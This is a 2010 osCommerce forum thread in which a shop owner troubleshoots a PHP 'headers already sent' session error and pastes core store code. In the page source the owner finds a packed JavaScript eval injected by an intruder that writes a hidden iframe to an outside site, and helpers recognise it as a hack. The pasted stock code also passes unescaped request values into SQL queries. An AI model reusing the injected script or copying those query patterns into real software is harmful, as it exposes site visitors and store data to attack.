home_field Posted September 27, 2010 Share Posted September 27, 2010 Hi on my site i am gettin the following error message. Warning: Session_Start() [function.session-start]: Cannot send session cooki - headers alresy sent by (output started at /home/hfsonlin/public_html/includes/application_top.php:29) in /home/hfsonlin/public_html/includes/functions/session.php on line 45 I have searched forums looking for solutions, i have tried removing all white spaces from my files.. I have stopped using filemanager and now use dreamweaver, but still with no luck has anyone any ideas of what i could be doing wrong. thanks donal Link to comment Share on other sites More sharing options...
MrPhil Posted September 27, 2010 Share Posted September 27, 2010 The error message tells you that application_top.php sent text output to the browser on or near line 29. It shouldn't have. Check if there is an error message before that one (issued by application_top -- perhaps that includes/configure.php is not readable?), or garbage from a bad edit, or even a hack. Read my sig > FAQs > "Cannot modify header" for more suggestions on where to look. Link to comment Share on other sites More sharing options...
home_field Posted October 4, 2010 Author Share Posted October 4, 2010 Phil, I read your FAQs and they where a real help in understanding the problem, but i still cant for the life of me fix it.. Warning: session_start() [function.session-start]: Cannot send session cookie - headers already sent by (output started at /home/hfsonlin/public_html/includes/application_top.php:29) in /home/hfsonlin/public_html/includes/functions/sessions.php on line 102 application_top.php code: <?php /* $Id: application_top.php 1833 2008-01-30 22:03:30Z hpdl $ osCommerce, Open Source E-Commerce Solutions http://www.oscommerce.com Copyright (c) 2008 osCommerce Released under the GNU General Public License */ // start the timer for the page parse time log define('PAGE_PARSE_START_TIME', microtime()); // set the level of error reporting error_reporting(E_ALL & ~E_NOTICE); // check support for register_globals if (function_exists('ini_get') && (ini_get('register_globals') == false) && (PHP_VERSION < 4.3) ) { exit('Server Requirement Error: register_globals is disabled in your PHP configuration. This can be enabled in your php.ini configuration file or in the .htaccess file in your catalog directory. Please use PHP 4.3+ if register_globals cannot be enabled on the server.'); } // Set the local configuration parameters - mainly for developers if (file_exists('includes/local/configure.php')) include('includes/local/configure.php'); // include server parameters require('includes/configure.php'); if (strlen(DB_SERVER) < 1) { if (is_dir('install')) { header('Location: install/index.php'); } } // define the project version define('PROJECT_VERSION', 'osCommerce Online Merchant v2.2 RC2a'); // some code to solve compatibility issues require(DIR_WS_FUNCTIONS . 'compatibility.php'); // set the type of request (secure or not) $request_type = (getenv('HTTPS') == 'on') ? 'SSL' : 'NONSSL'; // set php_self in the local scope if (!isset($PHP_SELF)) $PHP_SELF = $HTTP_SERVER_VARS['PHP_SELF']; if ($request_type == 'NONSSL') { define('DIR_WS_CATALOG', DIR_WS_HTTP_CATALOG); } else { define('DIR_WS_CATALOG', DIR_WS_HTTPS_CATALOG); } // include the list of project filenames require(DIR_WS_INCLUDES . 'filenames.php'); // include the list of project database tables require(DIR_WS_INCLUDES . 'database_tables.php'); // customization for the design layout define('BOX_WIDTH', 190); // how wide the boxes should be in pixels (default: 125) define('BOX_WIDTH_RIGHT', 163); // how wide the boxes should be in pixels (default: 125) // include the database functions require(DIR_WS_FUNCTIONS . 'database.php'); // make a connection to the database... now tep_db_connect() or die('Unable to connect to database server!'); // set the application parameters $configuration_query = tep_db_query('select configuration_key as cfgKey, configuration_value as cfgValue from ' . TABLE_CONFIGURATION); while ($configuration = tep_db_fetch_array($configuration_query)) { define($configuration['cfgKey'], $configuration['cfgValue']); } // if gzip_compression is enabled, start to buffer the output if ( (GZIP_COMPRESSION == 'true') && ($ext_zlib_loaded = extension_loaded('zlib')) && (PHP_VERSION >= '4') ) { if (($ini_zlib_output_compression = (int)ini_get('zlib.output_compression')) < 1) { if (PHP_VERSION >= '4.0.4') { ob_start('ob_gzhandler'); } else { include(DIR_WS_FUNCTIONS . 'gzip_compression.php'); ob_start(); ob_implicit_flush(); } } else { ini_set('zlib.output_compression_level', GZIP_LEVEL); } } // set the HTTP GET parameters manually if search_engine_friendly_urls is enabled if (SEARCH_ENGINE_FRIENDLY_URLS == 'true') { if (strlen(getenv('PATH_INFO')) > 1) { $GET_array = array(); $PHP_SELF = str_replace(getenv('PATH_INFO'), '', $PHP_SELF); $vars = explode('/', substr(getenv('PATH_INFO'), 1)); for ($i=0, $n=sizeof($vars); $i<$n; $i++) { if (strpos($vars[$i], '[]')) { $GET_array[substr($vars[$i], 0, -2)][] = $vars[$i+1]; } else { $HTTP_GET_VARS[$vars[$i]] = $vars[$i+1]; } $i++; } if (sizeof($GET_array) > 0) { while (list($key, $value) = each($GET_array)) { $HTTP_GET_VARS[$key] = $value; } } } } // define general functions used application-wide require(DIR_WS_FUNCTIONS . 'general.php'); require(DIR_WS_FUNCTIONS . 'html_output.php'); // set the cookie domain $cookie_domain = (($request_type == 'NONSSL') ? HTTP_COOKIE_DOMAIN : HTTPS_COOKIE_DOMAIN); $cookie_path = (($request_type == 'NONSSL') ? HTTP_COOKIE_PATH : HTTPS_COOKIE_PATH); // include cache functions if enabled if (USE_CACHE == 'true') include(DIR_WS_FUNCTIONS . 'cache.php'); // include shopping cart class require(DIR_WS_CLASSES . 'shopping_cart.php'); // include navigation history class require(DIR_WS_CLASSES . 'navigation_history.php'); // check if sessions are supported, otherwise use the php3 compatible session class if (!function_exists('session_start')) { define('PHP_SESSION_NAME', 'osCsid'); define('PHP_SESSION_PATH', $cookie_path); define('PHP_SESSION_DOMAIN', $cookie_domain); define('PHP_SESSION_SAVE_PATH', SESSION_WRITE_DIRECTORY); include(DIR_WS_CLASSES . 'sessions.php'); } // define how the session functions will be used require(DIR_WS_FUNCTIONS . 'sessions.php'); // set the session name and save path tep_session_name('osCsid'); tep_session_save_path(SESSION_WRITE_DIRECTORY); // set the session cookie parameters if (function_exists('session_set_cookie_params')) { session_set_cookie_params(0, $cookie_path, $cookie_domain); } elseif (function_exists('ini_set')) { ini_set('session.cookie_lifetime', '0'); ini_set('session.cookie_path', $cookie_path); ini_set('session.cookie_domain', $cookie_domain); } // set the session ID if it exists if (isset($HTTP_POST_VARS[tep_session_name()])) { tep_session_id($HTTP_POST_VARS[tep_session_name()]); } elseif ( ($request_type == 'SSL') && isset($HTTP_GET_VARS[tep_session_name()]) ) { tep_session_id($HTTP_GET_VARS[tep_session_name()]); } // start the session $session_started = false; if (SESSION_FORCE_COOKIE_USE == 'True') { tep_setcookie('cookie_test', 'please_accept_for_session', time()+60*60*24*30, $cookie_path, $cookie_domain); if (isset($HTTP_COOKIE_VARS['cookie_test'])) { tep_session_start(); $session_started = true; } } elseif (SESSION_BLOCK_SPIDERS == 'True') { $user_agent = strtolower(getenv('HTTP_USER_AGENT')); $spider_flag = false; if (tep_not_null($user_agent)) { $spiders = file(DIR_WS_INCLUDES . 'spiders.txt'); for ($i=0, $n=sizeof($spiders); $i<$n; $i++) { if (tep_not_null($spiders[$i])) { if (is_integer(strpos($user_agent, trim($spiders[$i])))) { $spider_flag = true; break; } } } } if ($spider_flag == false) { tep_session_start(); $session_started = true; } } else { tep_session_start(); $session_started = true; } if ( ($session_started == true) && (PHP_VERSION >= 4.3) && function_exists('ini_get') && (ini_get('register_globals') == false) ) { extract($_SESSION, EXTR_OVERWRITE+EXTR_REFS); } // set SID once, even if empty $SID = (defined('SID') ? SID : ''); // verify the ssl_session_id if the feature is enabled if ( ($request_type == 'SSL') && (SESSION_CHECK_SSL_SESSION_ID == 'True') && (ENABLE_SSL == true) && ($session_started == true) ) { $ssl_session_id = getenv('SSL_SESSION_ID'); if (!tep_session_is_registered('SSL_SESSION_ID')) { $SESSION_SSL_ID = $ssl_session_id; tep_session_register('SESSION_SSL_ID'); } if ($SESSION_SSL_ID != $ssl_session_id) { tep_session_destroy(); tep_redirect(tep_href_link(FILENAME_SSL_CHECK)); } } // verify the browser user agent if the feature is enabled if (SESSION_CHECK_USER_AGENT == 'True') { $http_user_agent = getenv('HTTP_USER_AGENT'); if (!tep_session_is_registered('SESSION_USER_AGENT')) { $SESSION_USER_AGENT = $http_user_agent; tep_session_register('SESSION_USER_AGENT'); } if ($SESSION_USER_AGENT != $http_user_agent) { tep_session_destroy(); tep_redirect(tep_href_link(FILENAME_LOGIN)); } } // verify the IP address if the feature is enabled if (SESSION_CHECK_IP_ADDRESS == 'True') { $ip_address = tep_get_ip_address(); if (!tep_session_is_registered('SESSION_IP_ADDRESS')) { $SESSION_IP_ADDRESS = $ip_address; tep_session_register('SESSION_IP_ADDRESS'); } if ($SESSION_IP_ADDRESS != $ip_address) { tep_session_destroy(); tep_redirect(tep_href_link(FILENAME_LOGIN)); } } // create the shopping cart & fix the cart if necesary if (tep_session_is_registered('cart') && is_object($cart)) { if (PHP_VERSION < 4) { $broken_cart = $cart; $cart = new shoppingCart; $cart->unserialize($broken_cart); } } else { tep_session_register('cart'); $cart = new shoppingCart; } // include currencies class and create an instance require(DIR_WS_CLASSES . 'currencies.php'); $currencies = new currencies(); // include the mail classes require(DIR_WS_CLASSES . 'mime.php'); require(DIR_WS_CLASSES . 'email.php'); // set the language if (!tep_session_is_registered('language') || isset($HTTP_GET_VARS['language'])) { if (!tep_session_is_registered('language')) { tep_session_register('language'); tep_session_register('languages_id'); } include(DIR_WS_CLASSES . 'language.php'); $lng = new language(); if (isset($HTTP_GET_VARS['language']) && tep_not_null($HTTP_GET_VARS['language'])) { $lng->set_language($HTTP_GET_VARS['language']); } else { $lng->get_browser_language(); } $language = $lng->language['directory']; $languages_id = $lng->language['id']; } // include the language translations require(DIR_WS_LANGUAGES . $language . '.php'); // Ultimate SEO URLs v2.2d if ((!defined(SEO_ENABLED)) || (SEO_ENABLED == 'true')) { include_once(DIR_WS_CLASSES . 'seo.class.php'); if ( !is_object($seo_urls) ){ $seo_urls = new SEO_URL($languages_id); } } // currency if (!tep_session_is_registered('currency') || isset($HTTP_GET_VARS['currency']) || ( (USE_DEFAULT_LANGUAGE_CURRENCY == 'true') && (LANGUAGE_CURRENCY != $currency) ) ) { if (!tep_session_is_registered('currency')) tep_session_register('currency'); if (isset($HTTP_GET_VARS['currency']) && $currencies->is_set($HTTP_GET_VARS['currency'])) { $currency = $HTTP_GET_VARS['currency']; } else { $currency = (USE_DEFAULT_LANGUAGE_CURRENCY == 'true') ? LANGUAGE_CURRENCY : DEFAULT_CURRENCY; } } // navigation history if (tep_session_is_registered('navigation')) { if (PHP_VERSION < 4) { $broken_navigation = $navigation; $navigation = new navigationHistory; $navigation->unserialize($broken_navigation); } } else { tep_session_register('navigation'); $navigation = new navigationHistory; } $navigation->add_current_page(); // Shopping cart actions if (isset($HTTP_GET_VARS['action'])) { // redirect the customer to a friendly cookie-must-be-enabled page if cookies are disabled if ($session_started == false) { tep_redirect(tep_href_link(FILENAME_COOKIE_USAGE)); } if (DISPLAY_CART == 'true') { $goto = FILENAME_SHOPPING_CART; $parameters = array('action', 'cPath', 'products_id', 'pid'); } else { $goto = basename($PHP_SELF); if ($HTTP_GET_VARS['action'] == 'buy_now') { $parameters = array('action', 'pid', 'products_id'); } else { $parameters = array('action', 'pid'); } } switch ($HTTP_GET_VARS['action']) { // customer wants to update the product quantity in their shopping cart case 'update_product' : for ($i=0, $n=sizeof($HTTP_POST_VARS['products_id']); $i<$n; $i++) { if (in_array($HTTP_POST_VARS['products_id'][$i], (is_array($HTTP_POST_VARS['cart_delete']) ? $HTTP_POST_VARS['cart_delete'] : array()))) { $cart->remove($HTTP_POST_VARS['products_id'][$i]); } else { if (PHP_VERSION < 4) { // if PHP3, make correction for lack of multidimensional array. reset($HTTP_POST_VARS); while (list($key, $value) = each($HTTP_POST_VARS)) { if (is_array($value)) { while (list($key2, $value2) = each($value)) { if (ereg ("(.*)\]\[(.*)", $key2, $var)) { $id2[$var[1]][$var[2]] = $value2; } } } } $attributes = ($id2[$HTTP_POST_VARS['products_id'][$i]]) ? $id2[$HTTP_POST_VARS['products_id'][$i]] : ''; } else { $attributes = ($HTTP_POST_VARS['id'][$HTTP_POST_VARS['products_id'][$i]]) ? $HTTP_POST_VARS['id'][$HTTP_POST_VARS['products_id'][$i]] : ''; } $cart->add_cart($HTTP_POST_VARS['products_id'][$i], $HTTP_POST_VARS['cart_quantity'][$i], $attributes, false); } } tep_redirect(tep_href_link($goto, tep_get_all_get_params($parameters))); break; // customer adds a product from the products page case 'add_product' : if (isset($HTTP_POST_VARS['products_id']) && is_numeric($HTTP_POST_VARS['products_id'])) { //++++ QT Pro: Begin Changed code $attributes=array(); if (isset($HTTP_POST_VARS['attrcomb']) && (preg_match("/^\d{1,10}-\d{1,10}(,\d{1,10}-\d{1,10})*$/",$HTTP_POST_VARS['attrcomb']))) { $attrlist=explode(',',$HTTP_POST_VARS['attrcomb']); foreach ($attrlist as $attr) { list($oid, $oval)=explode('-',$attr); if (is_numeric($oid) && $oid==(int)$oid && is_numeric($oval) && $oval==(int)$oval) $attributes[$oid]=$oval; } } if (isset($HTTP_POST_VARS['id']) && is_array($HTTP_POST_VARS['id'])) { foreach ($HTTP_POST_VARS['id'] as $key=>$val) { if (is_numeric($key) && $key==(int)$key && is_numeric($val) && $val==(int)$val) $attributes=$attributes + $HTTP_POST_VARS['id']; } } $cart->add_cart($HTTP_POST_VARS['products_id'], $cart->get_quantity(tep_get_uprid($HTTP_POST_VARS['products_id'], $attributes))+1, $attributes); //++++ QT Pro: End Changed Code } tep_redirect(tep_href_link($goto, tep_get_all_get_params($parameters))); break; // performed by the 'buy now' button in product listings and review page case 'buy_now' : if (isset($HTTP_GET_VARS['products_id'])) { if (tep_has_product_attributes($HTTP_GET_VARS['products_id'])) { tep_redirect(tep_href_link(FILENAME_PRODUCT_INFO, 'products_id=' . $HTTP_GET_VARS['products_id'])); } else { $cart->add_cart($HTTP_GET_VARS['products_id'], $cart->get_quantity($HTTP_GET_VARS['products_id'])+1); } } tep_redirect(tep_href_link($goto, tep_get_all_get_params($parameters))); break; case 'notify' : if (tep_session_is_registered('customer_id')) { if (isset($HTTP_GET_VARS['products_id'])) { $notify = $HTTP_GET_VARS['products_id']; } elseif (isset($HTTP_GET_VARS['notify'])) { $notify = $HTTP_GET_VARS['notify']; } elseif (isset($HTTP_POST_VARS['notify'])) { $notify = $HTTP_POST_VARS['notify']; } else { tep_redirect(tep_href_link(basename($PHP_SELF), tep_get_all_get_params(array('action', 'notify')))); } if (!is_array($notify)) $notify = array($notify); for ($i=0, $n=sizeof($notify); $i<$n; $i++) { $check_query = tep_db_query("select count(*) as count from " . TABLE_PRODUCTS_NOTIFICATIONS . " where products_id = '" . $notify[$i] . "' and customers_id = '" . $customer_id . "'"); $check = tep_db_fetch_array($check_query); if ($check['count'] < 1) { tep_db_query("insert into " . TABLE_PRODUCTS_NOTIFICATIONS . " (products_id, customers_id, date_added) values ('" . $notify[$i] . "', '" . $customer_id . "', now())"); } } tep_redirect(tep_href_link(basename($PHP_SELF), tep_get_all_get_params(array('action', 'notify')))); } else { $navigation->set_snapshot(); tep_redirect(tep_href_link(FILENAME_LOGIN, '', 'SSL')); } break; case 'notify_remove' : if (tep_session_is_registered('customer_id') && isset($HTTP_GET_VARS['products_id'])) { $check_query = tep_db_query("select count(*) as count from " . TABLE_PRODUCTS_NOTIFICATIONS . " where products_id = '" . $HTTP_GET_VARS['products_id'] . "' and customers_id = '" . $customer_id . "'"); $check = tep_db_fetch_array($check_query); if ($check['count'] > 0) { tep_db_query("delete from " . TABLE_PRODUCTS_NOTIFICATIONS . " where products_id = '" . $HTTP_GET_VARS['products_id'] . "' and customers_id = '" . $customer_id . "'"); } tep_redirect(tep_href_link(basename($PHP_SELF), tep_get_all_get_params(array('action')))); } else { $navigation->set_snapshot(); tep_redirect(tep_href_link(FILENAME_LOGIN, '', 'SSL')); } break; case 'cust_order' : if (tep_session_is_registered('customer_id') && isset($HTTP_GET_VARS['pid'])) { if (tep_has_product_attributes($HTTP_GET_VARS['pid'])) { tep_redirect(tep_href_link(FILENAME_PRODUCT_INFO, 'products_id=' . $HTTP_GET_VARS['pid'])); } else { $cart->add_cart($HTTP_GET_VARS['pid'], $cart->get_quantity($HTTP_GET_VARS['pid'])+1); } } tep_redirect(tep_href_link($goto, tep_get_all_get_params($parameters))); break; } } // include the who's online functions require(DIR_WS_FUNCTIONS . 'whos_online.php'); tep_update_whos_online(); // include the password crypto functions require(DIR_WS_FUNCTIONS . 'password_funcs.php'); // include validation functions (right now only email address) require(DIR_WS_FUNCTIONS . 'validations.php'); // split-page-results require(DIR_WS_CLASSES . 'split_page_results.php'); // infobox require(DIR_WS_CLASSES . 'boxes.php'); // auto activate and expire banners require(DIR_WS_FUNCTIONS . 'banner.php'); tep_activate_banners(); tep_expire_banners(); // auto expire special products require(DIR_WS_FUNCTIONS . 'specials.php'); tep_expire_specials(); // calculate category path if (isset($HTTP_GET_VARS['cPath'])) { $cPath = $HTTP_GET_VARS['cPath']; } elseif (isset($HTTP_GET_VARS['products_id']) && !isset($HTTP_GET_VARS['manufacturers_id'])) { $cPath = tep_get_product_path($HTTP_GET_VARS['products_id']); } else { $cPath = ''; } if (tep_not_null($cPath)) { $cPath_array = tep_parse_category_path($cPath); $cPath = implode('_', $cPath_array); $current_category_id = $cPath_array[(sizeof($cPath_array)-1)]; } else { $current_category_id = 0; } // include the breadcrumb class and start the breadcrumb trail require(DIR_WS_CLASSES . 'breadcrumb.php'); $breadcrumb = new breadcrumb; $breadcrumb->add(HEADER_TITLE_TOP, HTTP_SERVER); $breadcrumb->add(HEADER_TITLE_CATALOG, tep_href_link(FILENAME_DEFAULT)); /*** Begin Header Tags SEO ***/ // add category names or the manufacturer name to the breadcrumb trail if (isset($cPath_array)) { for ($i=0, $n=sizeof($cPath_array); $i<$n; $i++) { $categories_query = tep_db_query("select categories_htc_title_tag from " . TABLE_CATEGORIES_DESCRIPTION . " where categories_id = '" . (int)$cPath_array[$i] . "' and language_id = '" . (int)$languages_id . "' LIMIT 1"); if (tep_db_num_rows($categories_query) > 0) { $categories = tep_db_fetch_array($categories_query); $breadcrumb->add($categories['categories_htc_title_tag'], tep_href_link(FILENAME_DEFAULT, 'cPath=' . implode('_', array_slice($cPath_array, 0, ($i+1))))); } else { break; } } } elseif (isset($_GET['manufacturers_id'])) { $manufacturers_query = tep_db_query("select manufacturers_htc_title_tag from " . TABLE_MANUFACTURERS_INFO . " where manufacturers_id = '" . (int)$_GET['manufacturers_id'] . "' AND languages_id = '" . (int)$languages_id . "' LIMIT 1"); if (tep_db_num_rows($manufacturers_query)) { $manufacturers = tep_db_fetch_array($manufacturers_query); $breadcrumb->add($manufacturers['manufacturers_htc_title_tag'], tep_href_link(FILENAME_DEFAULT, 'manufacturers_id=' . $_GET['manufacturers_id'])); } } // add the products name to the breadcrumb trail if (isset($_GET['products_id'])) { $products_query = tep_db_query("select pd.products_head_title_tag from " . TABLE_PRODUCTS . " p left join " . TABLE_PRODUCTS_DESCRIPTION . " pd on p.products_id = pd.products_id where p.products_id = '" . (int)$_GET['products_id'] . "' and pd.language_id ='" . (int)$languages_id . "' LIMIT 1"); if (tep_db_num_rows($products_query)) { $products = tep_db_fetch_array($products_query); $breadcrumb->add($products['products_head_title_tag'], tep_href_link(FILENAME_PRODUCT_INFO, 'cPath=' . $cPath . '&products_id=' . $_GET['products_id'])); } } /*** End Header Tags SEO ***/ // initialize the message stack for output messages require(DIR_WS_CLASSES . 'message_stack.php'); $messageStack = new messageStack; // set which precautions should be checked define('WARN_INSTALL_EXISTENCE', 'true'); define('WARN_CONFIG_WRITEABLE', 'true'); define('WARN_SESSION_DIRECTORY_NOT_WRITEABLE', 'true'); define('WARN_SESSION_AUTO_START', 'true'); define('WARN_DOWNLOAD_DIRECTORY_NOT_READABLE', 'true'); if ( (basename($PHP_SELF) != FILENAME_LOGIN) && (basename($PHP_SELF) != FILENAME_LOGOFF) && (basename($PHP_SELF) != FILENAME_CREATE_ACCOUNT) && (basename($PHP_SELF) != FILENAME_CREATE_ACCOUNT_SUCCESS) && (basename($PHP_SELF) != FILENAME_PASSWORD_FORGOTTEN)) { //$navigation->set_snapshot(); }?> session.php code: <?php /* $Id: sessions.php 1830 2008-01-30 00:58:21Z hpdl $ osCommerce, Open Source E-Commerce Solutions http://www.oscommerce.com Copyright (c) 2008 osCommerce Released under the GNU General Public License */ if ( (PHP_VERSION >= 4.3) && ((bool)ini_get('register_globals') == false) ) { @ini_set('session.bug_compat_42', 1); @ini_set('session.bug_compat_warn', 0); } if (STORE_SESSIONS == 'mysql') { if (!$SESS_LIFE = get_cfg_var('session.gc_maxlifetime')) { $SESS_LIFE = 1440; } function _sess_open($save_path, $session_name) { return true; } function _sess_close() { return true; } function _sess_read($key) { $value_query = tep_db_query("select value from " . TABLE_SESSIONS . " where sesskey = '" . tep_db_input($key) . "' and expiry > '" . time() . "'"); $value = tep_db_fetch_array($value_query); if (isset($value['value'])) { return $value['value']; } return ''; } function _sess_write($key, $val) { global $SESS_LIFE; $expiry = time() + $SESS_LIFE; $value = $val; $check_query = tep_db_query("select count(*) as total from " . TABLE_SESSIONS . " where sesskey = '" . tep_db_input($key) . "'"); $check = tep_db_fetch_array($check_query); if ($check['total'] > 0) { return tep_db_query("update " . TABLE_SESSIONS . " set expiry = '" . tep_db_input($expiry) . "', value = '" . tep_db_input($value) . "' where sesskey = '" . tep_db_input($key) . "'"); } else { return tep_db_query("insert into " . TABLE_SESSIONS . " values ('" . tep_db_input($key) . "', '" . tep_db_input($expiry) . "', '" . tep_db_input($value) . "')"); } } function _sess_destroy($key) { return tep_db_query("delete from " . TABLE_SESSIONS . " where sesskey = '" . tep_db_input($key) . "'"); } function _sess_gc($maxlifetime) { tep_db_query("delete from " . TABLE_SESSIONS . " where expiry < '" . time() . "'"); return true; } session_set_save_handler('_sess_open', '_sess_close', '_sess_read', '_sess_write', '_sess_destroy', '_sess_gc'); } function tep_session_start() { global $HTTP_GET_VARS, $HTTP_POST_VARS, $HTTP_COOKIE_VARS; $sane_session_id = true; if (isset($HTTP_GET_VARS[tep_session_name()])) { if (preg_match('/^[a-zA-Z0-9]+$/', $HTTP_GET_VARS[tep_session_name()]) == false) { unset($HTTP_GET_VARS[tep_session_name()]); $sane_session_id = false; } } elseif (isset($HTTP_POST_VARS[tep_session_name()])) { if (preg_match('/^[a-zA-Z0-9]+$/', $HTTP_POST_VARS[tep_session_name()]) == false) { unset($HTTP_POST_VARS[tep_session_name()]); $sane_session_id = false; } } elseif (isset($HTTP_COOKIE_VARS[tep_session_name()])) { if (preg_match('/^[a-zA-Z0-9]+$/', $HTTP_COOKIE_VARS[tep_session_name()]) == false) { $session_data = session_get_cookie_params(); setcookie(tep_session_name(), '', time()-42000, $session_data['path'], $session_data['domain']); $sane_session_id = false; } } if ($sane_session_id == false) { tep_redirect(tep_href_link(FILENAME_DEFAULT, '', 'NONSSL', false)); } return session_start(); } function tep_session_register($variable) { global $session_started; if ($session_started == true) { if (PHP_VERSION < 4.3) { return session_register($variable); } else { if (isset($GLOBALS[$variable])) { $_SESSION[$variable] =& $GLOBALS[$variable]; } else { $_SESSION[$variable] = null; } } } return false; } function tep_session_is_registered($variable) { if (PHP_VERSION < 4.3) { return session_is_registered($variable); } else { return isset($_SESSION) && array_key_exists($variable, $_SESSION); } } function tep_session_unregister($variable) { if (PHP_VERSION < 4.3) { return session_unregister($variable); } else { unset($_SESSION[$variable]); } } function tep_session_id($sessid = '') { if (!empty($sessid)) { return session_id($sessid); } else { return session_id(); } } function tep_session_name($name = '') { if (!empty($name)) { return session_name($name); } else { return session_name(); } } function tep_session_close() { if (PHP_VERSION >= '4.0.4') { return session_write_close(); } elseif (function_exists('session_close')) { return session_close(); } } function tep_session_destroy() { return session_destroy(); } function tep_session_save_path($path = '') { if (!empty($path)) { return session_save_path($path); } else { return session_save_path(); } } function tep_session_recreate() { if (PHP_VERSION >= 4.1) { $session_backup = $_SESSION; unset($_COOKIE[tep_session_name()]); tep_session_destroy(); if (STORE_SESSIONS == 'mysql') { session_set_save_handler('_sess_open', '_sess_close', '_sess_read', '_sess_write', '_sess_destroy', '_sess_gc'); } tep_session_start(); $_SESSION = $session_backup; unset($session_backup); } } ?> If you could take a look and see if you could spot the error it would be great. Donal Link to comment Share on other sites More sharing options...
MrPhil Posted October 5, 2010 Share Posted October 5, 2010 If you're looking at the right application_top.php file (the one in includes/, not admin/includes/) the closest thing to line 29 that might give an error is require('includes/configure.php'); Are you getting an error message on the screen that you're overlooking, perhaps that the file is inaccessible or something? In your browser, View > Page source and see if there is any text ahead of the error message you posted. If you're not sure which is line 29, try inserting a comment line at line 30 or so. If the error message now says 30, move the new comment down by 5 and repeat until the message stays at one line. Move back up one line at a time until the error message again says 30. You should have pinpointed which line is causing output (the one right after the new comment). I've seen lots of people reporting trouble with application_top.php trying to read includes/configure.php. What are configure.php's permissions? It needs to be readable by PHP (usually 444 permissions). If configure.php was outputting any text, I would have expected the error message to give it as the start of output, not application_top.php. Link to comment Share on other sites More sharing options...
home_field Posted October 7, 2010 Author Share Posted October 7, 2010 If you're looking at the right application_top.php file (the one in includes/, not admin/includes/) the closest thing to line 29 that might give an error is require('includes/configure.php'); Are you getting an error message on the screen that you're overlooking, perhaps that the file is inaccessible or something? In your browser, View > Page source and see if there is any text ahead of the error message you posted. If you're not sure which is line 29, try inserting a comment line at line 30 or so. If the error message now says 30, move the new comment down by 5 and repeat until the message stays at one line. Move back up one line at a time until the error message again says 30. You should have pinpointed which line is causing output (the one right after the new comment). I've seen lots of people reporting trouble with application_top.php trying to read includes/configure.php. What are configure.php's permissions? It needs to be readable by PHP (usually 444 permissions). If configure.php was outputting any text, I would have expected the error message to give it as the start of output, not application_top.php. This is what appears at the top when i view the page source. <script language='JavaScript'>eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('6.7(\'<2 5="4://3.8.9/" b="1" c="1" a="0"></2>\');',13,13,'||iframe|ultimate29|http|src|document|write|co|cc|frameborder|width|height'.split('|'),0,{}));</script><br /> <b>Warning</b>: session_start() [<a href='function.session-start'>function.session-start</a>]: Cannot send session cookie - headers already sent by (output started at /home/hfsonlin/public_html/includes/application_top.php:29) in <b>/home/hfsonlin/public_html/includes/functions/sessions.php</b> on line <b>102</b><br /> <br /> <b>Warning</b>: session_start() [<a href='function.session-start'>function.session-start</a>]: Cannot send session cache limiter - headers already sent (output started at /home/hfsonlin/public_html/includes/application_top.php:29) in <b>/home/hfsonlin/public_html/includes/functions/sessions.php</b> on line <b>102</b><br /> I dont know what the first line means, would it be pointing to the problem or error??? I changed the permissions on the configure file to 444 but still no luck.. I changed the format of the file in notepad++ to binary, to try remove the extra BOM characters but still nothin.. i just cant find the problem.. Link to comment Share on other sites More sharing options...
germ Posted October 7, 2010 Share Posted October 7, 2010 Looks like a hack script. Hack files in the images folder: goog1e1239477b169778.php goog1e1d53f1c6872cb.php goog1e624842106cc54a.php goog1ece848648a3a7a0.php Visit the link below: How to Secure Your Site Pay close attention to "SECURING THE ADMIN" - Yours is vulnerable. If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you. "Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice." - Me - "Headers already sent" - The definitive help "Cannot redeclare ..." - How to find/fix it SSL Implementation Help Like this post? "Like" it again over there > Link to comment Share on other sites More sharing options...
home_field Posted October 8, 2010 Author Share Posted October 8, 2010 Looks like a hack script. Hack files in the images folder: goog1e1239477b169778.php goog1e1d53f1c6872cb.php goog1e624842106cc54a.php goog1ece848648a3a7a0.php Visit the link below: How to Secure Your Site Pay close attention to "SECURING THE ADMIN" - Yours is vulnerable. Will deleting these files fix the error or is there other hidin code which would have to be removed..??? I have be poined to that security link before, a couple of weeks ago and installed the add-ons.. I will take another look at securing the admin side of things.. The site must have been hacked before that?? donal Link to comment Share on other sites More sharing options...
germ Posted October 8, 2010 Share Posted October 8, 2010 Read your /includes/application_top.php from the server and post the first 50 or 60 lines from it. I think we'll find hack code there. If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you. "Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice." - Me - "Headers already sent" - The definitive help "Cannot redeclare ..." - How to find/fix it SSL Implementation Help Like this post? "Like" it again over there > Link to comment Share on other sites More sharing options...
home_field Posted October 8, 2010 Author Share Posted October 8, 2010 Read your /includes/application_top.php from the server and post the first 50 or 60 lines from it. I think we'll find hack code there. application_top <?php $Id: application_top.php 1833 2008-01-30 22:03:30Z hpdl $ osCommerce, Open Source E-Commerce Solutions http://www.oscommerce.com Copyright (c) 2008 osCommerce Released under the GNU General Public License */ // start the timer for the page parse time log define('PAGE_PARSE_START_TIME', microtime()); // set the level of error reporting error_reporting(E_ALL & ~E_NOTICE); // check support for register_globals if (function_exists('ini_get') && (ini_get('register_globals') == false) && (PHP_VERSION < 4.3) ) { exit('Server Requirement Error: register_globals is disabled in your PHP configuration. This can be enabled in your php.ini configuration file or in the .htaccess file in your catalog directory. Please use PHP 4.3+ if register_globals cannot be enabled on the server.'); } // Set the local configuration parameters - mainly for developers if (file_exists('includes/local/configure.php')) include('includes/local/configure.php'); // include server parameters require('includes/configure.php'); //test comment line if (strlen(DB_SERVER) < 1) { if (is_dir('install')) { header('Location: install/index.php'); } } // define the project version define('PROJECT_VERSION', 'osCommerce Online Merchant v2.2 RC2a'); // some code to solve compatibility issues require(DIR_WS_FUNCTIONS . 'compatibility.php'); // set the type of request (secure or not) $request_type = (getenv('HTTPS') == 'on') ? 'SSL' : 'NONSSL'; // set php_self in the local scope if (!isset($PHP_SELF)) $PHP_SELF = $HTTP_SERVER_VARS['PHP_SELF']; if ($request_type == 'NONSSL') { define('DIR_WS_CATALOG', DIR_WS_HTTP_CATALOG); } else { define('DIR_WS_CATALOG', DIR_WS_HTTPS_CATALOG); } // include the list of project filenames require(DIR_WS_INCLUDES . 'filenames.php'); // include the list of project database tables require(DIR_WS_INCLUDES 